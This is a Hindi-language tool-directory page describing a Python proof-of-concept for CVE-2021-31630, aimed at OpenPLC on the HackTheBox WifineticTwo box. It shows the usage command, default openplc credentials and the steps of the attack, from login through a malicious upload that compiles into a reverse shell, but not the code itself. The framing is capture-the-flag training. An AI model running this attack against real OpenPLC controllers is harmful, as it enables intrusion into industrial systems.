Skip to content
KitploitKITPLOIT
उपकरणएक्सप्लॉइटब्लॉग
Log in
जमा करें
उपकरणएक्सप्लॉइटब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
htb-wifinetictwo-exploit — HTB WifineticTwo CTF पर CVE-2021-31630 का शोषण करने के लिए एक सरल python स्क्रिप्ट | Kitploit
उपकरण/GitHubGitHub/behindsecurity/htb-wifinetictwo-exploit
पेलोड जनरेशनभेद्यता विश्लेषणशोषणवेब एप्लिकेशन शोषणCTFलर्निंग और शिक्षारिमोट एक्सेस टूलबाइनरी शोषण

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
GitHub
behindsecurity/htb-wifinetictwo-exploit

htb-wifinetictwo-exploit

HTB WifineticTwo CTF पर CVE-2021-31630 का शोषण करने के लिए एक सरल python स्क्रिप्ट

रिपॉजिटरी देखें
82 साल पहलेअभी तक समीक्षित नहीं
साझा करें

CVE-2021-31630 शोषण PoC

यह Python स्क्रिप्ट CVE-2021-31630 के लिए एक प्रूफ ऑफ कॉन्सेप्ट (PoC) शोषण है, जो HackTheBox पर WifineticTwo बॉक्स पर चलने वाले OpenPLC में एक कमजोरी को लक्षित करता है। यह केवल शैक्षिक उद्देश्यों के लिए डिज़ाइन किया गया है, जिसका उद्देश्य नियंत्रित वातावरण में शोषण प्रक्रिया को प्रदर्शित करना है।

अस्वीकरण

यह उपकरण केवल सुरक्षा अनुसंधान और शैक्षिक उद्देश्यों के लिए है। पूर्व आपसी सहमति के बिना लक्ष्यों पर हमला करने के लिए इस उपकरण का उपयोग अवैध है। डेवलपर इस शोषण का दुरुपयोग करने वाले उपयोगकर्ताओं के खिलाफ किसी भी नुकसान या आपराधिक आरोपों के लिए जिम्मेदार नहीं होगा।

आवश्यक शर्तें

इस शोषण को चलाने से पहले, सुनिश्चित करें कि आपके पास:

  • आपके सिस्टम पर Python 3 स्थापित है।
  • requests लाइब्रेरी स्थापित है। आप इसे pip install requests का उपयोग करके स्थापित कर सकते हैं।

उपयोग

इस शोषण का उपयोग करने के लिए, आपको लक्ष्य का URL, स्थानीय होस्ट IP (LHOST), और स्थानीय पोर्ट (LPORT) निर्दिष्ट करना होगा जिस पर रिवर्स शेल को वापस कनेक्ट करना चाहिए। वैकल्पिक रूप से, यदि वे डिफ़ॉल्ट से भिन्न हैं तो आप OpenPLC के लिए उपयोगकर्ता नाम और पासवर्ड निर्दिष्ट कर सकते हैं।

./exploit.py --target http://wifinetictwo.htb:8080 --lhost [LHOST] --lport [LPORT] [--usr [USERNAME] --pwd [PASSWORD]]

तर्क

  • --target - लक्ष्य का आधार पता। उदाहरण: http://wifinetictwo.htb:8080
  • --lhost - रिवर्स शेल के वापस कनेक्ट होने के लिए स्थानीय होस्ट IP पता।
  • --lport - रिवर्स शेल के वापस कनेक्ट होने के लिए स्थानीय पोर्ट।
  • --usr - (वैकल्पिक) OpenPLC के लिए उपयोगकर्ता नाम। डिफ़ॉल्ट openplc है।
  • --pwd - (वैकल्पिक) OpenPLC के लिए पासवर्ड। डिफ़ॉल्ट openplc है।

विशेषताएँ

  • प्रदान किए गए क्रेडेंशियल का उपयोग करके स्वचालित रूप से लॉगिन प्रक्रिया को संभालता है।
  • रिमोट कोड निष्पादन प्राप्त करने के लिए एक दुर्भावनापूर्ण पेलोड तैयार और अपलोड करता है।
  • हमलावर के निर्दिष्ट IP और पोर्ट पर वापस एक रिवर्स शेल प्रारंभ करता है।

शोषण प्रक्रिया

  1. लॉगिन: स्क्रिप्ट प्रदान किए गए क्रेडेंशियल का उपयोग करके OpenPLC एप्लिकेशन में लॉग इन करती है।
  2. पेलोड निर्माण: रिवर्स शेल प्रारंभ करने के लिए डिज़ाइन किए गए एक दुर्भावनापूर्ण पेलोड को गतिशील रूप से तैयार करती है।
  3. पेलोड अपलोड: तैयार पेलोड को सर्वर पर अपलोड करती है।
  4. शोषण ट्रिगर: अपलोड किए गए दुर्भावनापूर्ण कोड को संकलित करने का प्रयास करके शोषण को ट्रिगर करती है, जिसके परिणामस्वरूप एक रिवर्स शेल बनता है।

आभार

  • विशेष धन्यवाद Fellipe Oliveira को, जिन्होंने CVE-2021-31630 की खोज और रिपोर्ट की।
  • HackTheBox को साइबर सुरक्षा के बारे में अभ्यास और सीखने के लिए एक यथार्थवादी वातावरण प्रदान करने के लिए।
टूल डाउनलोड करें